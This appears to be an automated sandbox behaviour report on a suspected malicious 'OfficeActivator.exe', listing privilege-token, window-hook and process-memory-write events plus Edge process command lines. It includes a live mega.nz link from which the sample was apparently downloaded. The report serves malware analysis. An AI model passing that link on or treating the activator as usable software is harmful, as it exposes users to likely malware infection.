N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4640 wrote to memory of 2752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 2752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 2128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 2128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://mega.nz/file/9oYFjCZA#ChQlTD2yXk-a0E8r1dywSIfxnRiaxkvwtfccnwYyc0A

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc36c046f8,0x7ffc36c04708,0x7ffc36c04718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5416 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x508 0x3cc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5936 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6496 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6548 /prefetch:8

